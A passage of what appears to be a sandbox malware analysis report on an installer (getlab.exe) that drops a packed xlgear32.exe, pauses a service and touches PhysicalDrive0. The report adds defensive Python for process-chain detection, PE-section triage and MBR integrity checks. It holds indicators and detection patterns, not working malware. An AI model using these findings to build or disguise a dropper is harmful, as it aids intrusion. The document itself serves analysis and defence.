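            m = NET_PAUSE.search(child["CommandLine"])
            if m and image.endswith(("\\net.exe", "\\net1.exe")):
                paused_service = m.group(1)
            elif LOCAL_APPDATA_EXE.search(child["Image"]):
                payloads.append(child["Image"])
        if paused_service and payloads:
            findings.append({"installer": ev["Image"],
                             "paused_service": paused_service,
                             "payloads": payloads})
    return findings


if __name__ == "__main__":
    for hit in find_installer_chains(EVENTS):
        print(f"{hit['installer']} paused {hit['paused_service']} and started {hit['payloads']}")
```

In production the two child checks would be joined on ProcessGuid rather than the reusable ProcessId, and the rule would be fed from the EDR's process-tree store instead of an in-memory list; the matching logic is the same.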
Source: C:\Users\user\Desktop\getlab.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\getlab.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: sqlite3.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\XLGear_is1
Source: getlab.exe | Static file information: File size 3599599 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-K4GKL.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-Q00OL.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-K4GKL.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-4GRQU.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-Q00OL.tmp.1.dr

                    Data Obfuscation

Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Unpacked PE file: 4.2.xlgear32.exe.400000.0.unpack .stum8:ER;.stun8:R;.stuo8:W;.rsrc:R;.stup8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Unpacked PE file: 4.2.xlgear32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00450294 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00450294
Source: initial sample | Static PE information: section where entry point is pointing to: .stum8
Source: xlgear32.exe.1.dr | Static PE information: section name: .stum8
Source: xlgear32.exe.1.dr | Static PE information: section name: .stun8
Source: xlgear32.exe.1.dr | Static PE information: section name: .stuo8
Source: xlgear32.exe.1.dr | Static PE information: section name: .stup8
Source: is-GH467.tmp.1.dr | Static PE information: section name: /4
Source: is-GH467.tmp.1.dr | Static PE information: section name: /19
Source: is-GH467.tmp.1.dr | Static PE information: section name: /35
Source: is-GH467.tmp.1.dr | Static PE information: section name: /51
Source: is-GH467.tmp.1.dr | Static PE information: section name: /63
Source: is-GH467.tmp.1.dr | Static PE information: section name: /77
Source: is-GH467.tmp.1.dr | Static PE information: section name: /89
Source: is-GH467.tmp.1.dr | Static PE information: section name: /102
Source: is-GH467.tmp.1.dr | Static PE information: section name: /113
Source: is-GH467.tmp.1.dr | Static PE information: section name: /124
Source: is-4GRQU.tmp.1.dr | Static PE information: section name: Shared
Source: BridgeGamer.exe.4.dr | Static PE information: section name: .stum8
Source: BridgeGamer.exe.4.dr | Static PE information: section name: .stun8
Source: BridgeGamer.exe.4.dr | Static PE information: section name: .stuo8
Source: BridgeGamer.exe.4.dr | Static PE information: section name: .stup8
Source: sqlite3.dll.4.dr | Static PE information: section name: /4
Source: sqlite3.dll.4.dr | Static PE information: section name: /19
Source: sqlite3.dll.4.dr | Static PE information: section name: /35
Source: sqlite3.dll.4.dr | Static PE information: section name: /51
Source: sqlite3.dll.4.dr | Static PE information: section name: /63
Source: sqlite3.dll.4.dr | Static PE information: section name: /77
Source: sqlite3.dll.4.dr | Static PE information: section name: /89
Source: sqlite3.dll.4.dr | Static PE information: section name: /102
Source: sqlite3.dll.4.dr | Static PE information: section name: /113
Source: sqlite3.dll.4.dr | Static PE information: section name: /124
Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0040993C push 00409979h; ret 1_2_00409971
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0040A037 push ds; ret 1_2_0040A038
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004941B8 push ecx; mov dword ptr [esp], ecx 1_2_004941BD
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax 1_2_004062B5
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004106C8 push ecx; mov dword ptr [esp], edx 1_2_004106CD
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00412920 push 00412983h; ret 1_2_0041297B
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00484BE8 push ecx; mov dword ptr [esp], ecx 1_2_00484BED
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0040D020 push ecx; mov dword ptr [esp], edx 1_2_0040D022
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004590F0 push 00459134h; ret 1_2_0045912C
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00443438 push ecx; mov dword ptr [esp], ecx 1_2_0044343C
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00483544 push 00483633h; ret 1_2_0048362B
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0040F580 push ecx; mov dword ptr [esp], edx 1_2_0040F582
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0047759C push ecx; mov dword ptr [esp], edx 1_2_0047759D
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004517CC push 004517FFh; ret 1_2_004517F7
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00451990 push ecx; mov dword ptr [esp], eax 1_2_00451995
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0045FB44 push ecx; mov dword ptr [esp], ecx 1_2_0045FB48
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00419C20 push ecx; mov dword ptr [esp], ecx 1_2_00419C25
Source: xlgear32.exe.1.dr | Static PE information: section name: .stum8 entropy: 7.739050032528007
Source: BridgeGamer.exe.4.dr | Static PE information: section name: .stum8 entropy: 7.739050032528007
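The static findings above are the on-disk side of the "Detected unpacking (changes PE section rights)" verdict: the dropped xlgear32.exe (and the BridgeGamer.exe copy it writes to C:\ProgramData) carries non-standard sections named .stum8/.stun8/.stuo8/.stup8, the entry point sits in .stum8, that section has an entropy of 7.74 bits per byte, and .stup8 is mapped executable and writable (EW), while the image recovered from memory has a conventional .text/.rdata/.data layout. The following is an added example, not from the report or the sandbox: a standard-library-only PE section parser that scores each section on exactly those properties (unusual name, near-8.0 entropy, write+execute, holds the entry point). The PE it inspects is synthetic, built in memory by build_minimal_pe from placeholder bytes, so its numbers illustrate the checks rather than measure the sample.

```python
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
COMMON_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                   ".edata", ".pdata", ".bss", ".tls", ".CRT"}
HIGH_ENTROPY = 7.0   # bits per byte; packed or encrypted data sits near 8.0


def shannon_entropy(data):
    """Shannon entropy of a byte string, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Return (entry_point_rva, [section dicts]) from a PE32/PE32+ image."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections, = struct.unpack_from("<H", pe, e_lfanew + 6)     # COFF NumberOfSections
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)        # COFF SizeOfOptionalHeader
    opt_hdr = e_lfanew + 24
    entry_rva, = struct.unpack_from("<I", pe, opt_hdr + 16)        # AddressOfEntryPoint
    table = opt_hdr + opt_size                                     # section table follows
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        chars, = struct.unpack_from("<I", pe, off + 36)
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "vaddr": vaddr, "vsize": vsize, "rawsize": rawsize,
            "characteristics": chars,
            "entropy": shannon_entropy(pe[rawptr:rawptr + rawsize]),
        })
    return entry_rva, sections


def triage(pe):
    """Attach a list of suspicion flags to every section."""
    entry_rva, sections = parse_sections(pe)
    for s in sections:
        flags = []
        if s["name"] not in COMMON_SECTIONS:
            flags.append("nonstandard-name")
        if s["entropy"] > HIGH_ENTROPY:
            flags.append("high-entropy")
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            flags.append("writable+executable")
        if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            flags.append("entry-point")
        s["flags"] = flags
    return sections


def build_minimal_pe(sections, entry_rva):
    """Synthetic PE32 with just enough header for parse_sections(); not loadable."""
    opt_size = 0xE0
    hdr_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    raw_base = (hdr_len + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                       # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva).ljust(opt_size, b"\0")
    table, body, vaddr = b"", b"", 0x1000
    for name, data, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data), vaddr,
                             len(data), raw_base + len(body), 0, 0, 0, 0, chars)
        body += data
        vaddr += (len(data) + 0xFFF) & ~0xFFF
    return (dos + coff + opt + table).ljust(raw_base, b"\0") + body


# Constructed sample: a plain code section, a packed-looking section that holds the
# entry point, and a writable+executable section. Placeholder bytes, not the sample's.
SAMPLE_PE = build_minimal_pe([
    (".text", b"\x55\x8b\xec\x33\xc0\x5d\xc3\x90" * 64, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".stum8", bytes(range(256)) * 4, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".stup8", bytes(range(256)) * 2, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE),
], entry_rva=0x2010)

if __name__ == "__main__":
    for s in triage(SAMPLE_PE):
        print(f"{s['name']:<8} rva=0x{s['vaddr']:05x} entropy={s['entropy']:.2f} {' '.join(s['flags'])}")
```

Run against a real file with `triage(open(path, "rb").read())`; the same three flags on one section (unusual name, entropy above 7, entry point inside it) is the static signature of a packer stub, and a dumped in-memory image that no longer shows them is the unpacked payload the report refers to.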

                    Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 4_2_00401A4F
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 4_2_02D9F8A3
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-NVVDJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-Q00OL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-GH467.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-K4GKL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\LTDIS13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\Desktop\getlab.exe | File created: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcr71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\is-UJ38T.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\gdiplus.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-VVRBT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-B16F3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\sqlite3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcp71.dll (copy)
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | File created: C:\ProgramData\BridgeGamer\sqlite3.dll
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | File created: C:\ProgramData\BridgeGamer\BridgeGamer.exe
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-4GRQU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\bjpeg23.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\ltkrn13n.dll (copy)

                    Boot Survival

Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 4_2_00401A4F
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 4_2_02D9F8A3
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_00402253 StartServiceCtrlDispatcherA, 4_2_00402253
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C04
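The two xlgear32.exe functions listed above open \\.\PhysicalDrive0 with CreateFileA and issue a DeviceIoControl, which is what the "Contains functionality to infect the boot sector" signature keys on; StartServiceCtrlDispatcherA next to it is the entry point of a Windows service, consistent with the "net pause xl_gear_11293" call seen earlier. One caveat a responder should keep in mind: the recorded chain is CreateFileA, DeviceIoControl, GetLastError, CloseHandle with no WriteFile, and a DeviceIoControl on the raw disk handle is also how software reads disk properties such as the serial number, so the finding shows raw-disk access, not a confirmed MBR write. The check that settles it is to read sector 0 and compare it to a known-good copy. The following is an added example, not part of the report: it parses a 512-byte MBR, validates the 0x55AA signature and the partition table, and compares the bootstrap-code hash against a baseline. Both sectors and the baseline are constructed placeholders; on a live Windows host the sector would be read as Administrator from \\.\PhysicalDrive0.

```python
import hashlib
import struct

MBR_SIZE = 512
CODE_LEN = 446              # bootstrap code area, followed by 4 x 16-byte partition entries
PART_TABLE_OFF = 446
PART_ENTRY_LEN = 16
SIGNATURE = b"\x55\xaa"     # last two bytes of a valid MBR


def build_mbr(code, partitions):
    """Construct a synthetic MBR. partitions: (boot_flag, type, start_lba, sectors)."""
    if len(code) > CODE_LEN or len(partitions) > 4:
        raise ValueError("bootstrap code too long or too many partitions")
    sector = bytearray(code.ljust(CODE_LEN, b"\0"))
    for boot, ptype, start, count in partitions:
        # CHS fields left zero; modern loaders use the LBA fields
        sector += struct.pack("<B3sB3sII", boot, b"\0\0\0", ptype, b"\0\0\0", start, count)
    sector += b"\0" * (PART_ENTRY_LEN * (4 - len(partitions)))
    sector += SIGNATURE
    return bytes(sector)


def parse_mbr(sector):
    """Return signature status, bootstrap-code hash and the non-empty partition entries."""
    if len(sector) != MBR_SIZE:
        raise ValueError("expected a 512-byte sector")
    parts = []
    for i in range(4):
        off = PART_TABLE_OFF + i * PART_ENTRY_LEN
        boot, ptype, start, count = struct.unpack_from("<B3xB3xII", sector, off)
        if ptype != 0:
            parts.append({"index": i, "boot_flag": boot, "type": ptype,
                          "start_lba": start, "sectors": count})
    return {
        "signature_ok": sector[510:512] == SIGNATURE,
        "code_sha256": hashlib.sha256(sector[:CODE_LEN]).hexdigest(),
        "partitions": parts,
    }


def check_mbr(sector, baseline_code_sha256):
    """Compare a sector against a trusted baseline and list integrity problems."""
    info = parse_mbr(sector)
    issues = []
    if not info["signature_ok"]:
        issues.append("bad-signature")
    if info["code_sha256"] != baseline_code_sha256:
        issues.append("bootstrap-code-modified")
    parts = info["partitions"]
    for p in parts:
        if p["boot_flag"] not in (0x00, 0x80):       # only 0x80 (active) or 0x00 are valid
            issues.append(f"invalid-boot-flag:{p['index']}")
    for a in parts:
        for b in parts:
            if a["index"] < b["index"]:
                a_end = a["start_lba"] + a["sectors"]
                b_end = b["start_lba"] + b["sectors"]
                if a["start_lba"] < b_end and b["start_lba"] < a_end:
                    issues.append(f"overlapping-partitions:{a['index']},{b['index']}")
    info["issues"] = issues
    return info


# Constructed placeholder bootstrap bytes (not a real boot loader) and a single
# active NTFS-type partition starting at LBA 2048.
BASELINE_CODE = b"\x33\xc0\x8e\xd0\xbc\x00\x7c\xfb" + b"\x90" * 40
BASELINE_MBR = build_mbr(BASELINE_CODE, [(0x80, 0x07, 2048, 204800)])
BASELINE_HASH = hashlib.sha256(BASELINE_MBR[:CODE_LEN]).hexdigest()

# Same partition table, first two bytes of the bootstrap code replaced.
TAMPERED_MBR = build_mbr(b"\xeb\xfe" + BASELINE_CODE[2:], [(0x80, 0x07, 2048, 204800)])

if __name__ == "__main__":
    for label, sec in (("baseline", BASELINE_MBR), ("tampered", TAMPERED_MBR)):
        print(label, check_mbr(sec, BASELINE_HASH)["issues"] or "ok")
```

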